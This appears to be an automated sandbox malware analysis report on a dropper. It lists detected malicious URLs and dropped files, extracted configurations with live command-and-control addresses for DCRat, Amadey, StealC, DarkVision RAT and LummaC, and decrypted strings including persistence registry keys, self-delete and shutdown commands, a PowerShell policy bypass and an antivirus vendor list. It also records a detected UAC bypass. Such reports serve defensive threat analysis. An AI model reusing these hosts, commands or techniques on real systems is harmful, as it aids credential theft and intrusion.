Antivirus detection for URL or domain

Source: http://185.215.113.206/c4becf79229cb002.php/U0R	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/well/random.exe8	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/n:	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/user-PC	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dll8	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/random.exe9e	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/random.exe08	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/api#D	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php$9	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/random.exec	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/freebl3.dllz	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/mozglue.dll~	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/random.exek	Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/5131681669/KeaEfrP.ps1RN###	Avira URL Cloud: Label: malware
Source: http://77.73.39.158/4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpmRoot=C:	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/random.exec6~	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/QQ	Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/5131681669/KeaEfrP.ps1	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/well/random.exev	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\Idle.exe	Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\ProgramData\Package Cache\SystemSettings.exe	Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen

Found malware configuration

Source: 0000001E.00000002.2958021104.0000000002761000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: DCRat {"C2 url": "http://77.73.39.158/4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: 0000000C.00000002.2957628244.0000000000DD1000.00000040.00000001.01000000.0000000E.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000000.00000002.2114430584.000000000176E000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: 39.2.explorer.exe.2dd0000.0.unpack	Malware Configuration Extractor: DarkVision Rat {"C2": "185.157.162.216", "Port": 5200}
Source: 60c1233683.exe.8128.34.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["formy-spill.biz", "print-vexer.biz", "dare-curbys.biz", "zinc-sneark.biz", "se-blurry.biz", "covery-mover.biz", "impend-differ.biz", "atten-supporse.biz", "dwell-exclaim.biz"], "Build id": "LOGS11--LiveTraffic"}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	ReversingLabs: Detection: 68%
Source: C:\Program Files\Google\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	ReversingLabs: Detection: 68%
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\Idle.exe	ReversingLabs: Detection: 68%
Source: C:\ProgramData\Package Cache\SystemSettings.exe	ReversingLabs: Detection: 68%
Source: C:\Recovery\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\wTMEVe8[1].exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\ntRoEwh[1].exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\BVPoHZLO.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\CFNWwRDq.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\FwENDODk.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\IwlvVjWA.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\KhRLcxhs.log	ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\TNeBQEiF.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\XXhkisgW.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\YUJsDsvR.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\ZoAIeOtr.log	ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\cLzjLovK.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\cvxRAgnn.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\gmoIHdog.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\pXgQVFeT.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\qMYGMWSI.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\rYNynbxj.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\tSQOebbY.log	ReversingLabs: Detection: 20%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\wTMEVe8[1].exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Joe Sandbox ML: detected
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\Idle.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Package Cache\SystemSettings.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\ntRoEwh[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 19.0.wVBhC3KCkV.exe.7f0000.0.unpack	String decryptor: ["DG60LfP8phScmLrw3MasXB0Mv9s2D8nVZ8XXbdNapVivlXbwahdmiKgBPtELxW4q46DoyUUa89DCcFkYi5bgfAwObVHrYBnSb11oUw7GNDniHejKJqn15XL3KyNcMmB6","62df1561360c976b6df54aa148d2c20df01577eee0d5b1c8f866533f16f01bca","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVW93WTI1V2JFbHBkMmxQUTBrMlNXNVNlV1JYVldsTVEwazFTV3B2YVdSSVNqRmFVMGx6U1dwRmQwbHFiMmxrU0VveFdsTkpjMGxxUlhoSmFtOXBaRWhLTVZwVFNYTkpha1Y1U1dwdmFXUklTakZhVTBselNXcEZla2xxYjJsa1NFb3hXbE5KYzBscVJUQkphbTlwWkVoS01WcFRTamtpWFE9PSJd"]
Source: 19.0.wVBhC3KCkV.exe.7f0000.0.unpack	String decryptor: [["http://77.73.39.158/4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/","ProviderpipehttplowAuthBigloaddleLocalcdndownloads"]]
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: 185.215.113.43
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: /Zu7JuNko/index.php
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: S-%lu-
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: abc3bc1985
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: skotes.exe
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: Startup
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: cmd /C RMDIR /s/q
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: rundll32
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: Programs
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: %USERPROFILE%
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: cred.dll\|clip.dll\|
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: cred.dll
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: clip.dll
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: http://
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: https://
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: /quiet
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: /Plugins/
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: &unit=
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: shell32.dll
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: kernel32.dll
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: GetNativeSystemInfo
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: ProgramData\
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: AVAST Software
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: Kaspersky Lab
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: Panda Security
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: Doctor Web
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: 360TotalSecurity
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: Bitdefender
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: Norton
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: Sophos
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: Comodo
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: WinDefender
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: 0123456789
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: ------
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: ?scr=1
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: ComputerName
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: -unicode-
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: VideoID
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: DefaultSettings.XResolution
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: DefaultSettings.YResolution
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: ProductName
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: CurrentBuild
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: rundll32.exe
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: "taskkill /f /im "
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: " && timeout 1 && del
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: && Exit"
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: " && ren
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: Powershell.exe
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: -executionpolicy remotesigned -File "
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: shutdown -s -t 0
Source: 9.2.DBFIEHDHII.exe.d40000.0.unpack	String decryptor: random

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C5EA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E4440 PK11_PrivDecrypt,	0_2_6C5E4440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C5B4420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E44C0 PK11_PubEncrypt,	0_2_6C5E44C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6325B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6C6325B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6C5EA650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C8670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6C5C8670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6C5CE6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6C60A730
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C610180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6C610180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E43B0 PK11_PubEncryptPKCS1,PR_SetError,	0_2_6C5E43B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C607C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	0_2_6C607C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	0_2_6C5C7D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	0_2_6C60BD30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C609EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	0_2_6C609EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E3FF0 PK11_PrivDecryptPKCS1,	0_2_6C5E3FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6C5E3850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	0_2_6C5E9840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60DA40 SEC_PKCS7ContentIsEncrypted,	0_2_6C60DA40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C617410 NSS_SecureMemcmp,PR_SetError,PK11_Decrypt,	0_2_6C617410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E3560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6C5E3560

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 28.2.powershell.exe.60b0328.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.60324f8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.downloaded_file.exe.11fffa0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.downloaded_file.exe.11fffa0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.explorer.exe.2dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.0.downloaded_file.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.downloaded_file.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.60324f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.60b0328.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.2763632421.0000000001200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2956530663.0000000002E08000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2768909710.0000000000902000.00000002.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2807680074.00000000060A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.2762140149.0000000000902000.00000002.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2770761069.00000000011FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2807680074.0000000005D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3284, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: downloaded_file.exe PID: 7708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4124, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, type: DROPPED

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Directory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\Idle.exe
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Directory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\6ccacd8608530f
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Directory created: C:\Program Files\Google\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Directory created: C:\Program Files\Google\2ad47189800c09

Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49870 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49893 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49894 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49895 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49906 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49920 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49929 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49932 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49933 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49944 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49946 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49948 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49954 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49969 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49978 version: TLS 1.2
